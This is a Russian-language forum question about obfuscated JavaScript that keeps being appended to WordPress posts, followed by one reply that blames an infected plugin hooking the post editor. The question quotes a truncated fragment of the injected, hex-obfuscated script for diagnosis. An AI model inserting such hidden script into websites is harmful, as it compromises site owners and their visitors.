NibiruanChild
@NibiruanChild

Что делать, появляется javascript вставка в конце записей на worpdress?

Есть сайт на Wordpress.

И есть проблема, в том, что в конец некоторых статей добавляется такой кусок:


// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return " доменсайта"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e


  • На сайте тестировал пару нуленых тем, но предварительно проверял на вирустотале и все было норм. Сейчас все темы удалены.
  • Плагины использую те же, что и на многих других сайтах на которых проблем нет
  • Плагины-антивирусы ничего найти не могут (пробовал штук 5 разных).
  • Ai-bolit явного ничего не нашел, а подозрительные на его взгляд проверил, там вроде ничего нет.
  • Ручками через WinMerge прогнал, сравнил с чистым дистрибом Wordpress - в различающихся php ничего подозрительного не нашел.
  • В базе по кускам кода находит только тексты самих статей.
  • На других сайтах на том же аккаунте хостинга проблем нет.
  • Статьи пишет редактор, когда я тестирую со своего аккаунта что нибудь запостить - проблемы нет, а когда она постит новые посты, то проблема иногда есть. Беда в том, что иногда (может и через мой акк иногда тоже такая беда есть, но воспроизвести не удалось).
  • Но у нее стоит Касперский (знаю, что не панацея, но все же), и на всякий она недавно делала полную проверку.
  • Еще один момент, который меня смущает в версии, что проблема у нее, а не на сайте, это то, что в этом куске кода есть домен сайта на который постятся записи.


Даже не знаю. куда еще копать. кто встречался с проблемой? В гугле по кускам кода находит много других сайтов с вставками, причем в том числе созданных на wordpress.com (блогоплатформа).
  • Вопрос задан
  • 187 просмотров
Пригласить эксперта
Ответы на вопрос 1
Punkie
@Punkie
Этот код загоняется в редакторе поста в текстовом режиме (в визуальном его не видно), подставляется в конец поля ввода статьи. Встречался с таким - у меня заражённым оказался один из плагинов, который внедрил хук в редактор постов.
Рекомендую поставить чистый дистр, в него перенести посты и потом уже ручками аккуратно перенести тему. Плагины - ставить заново из репозитория.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы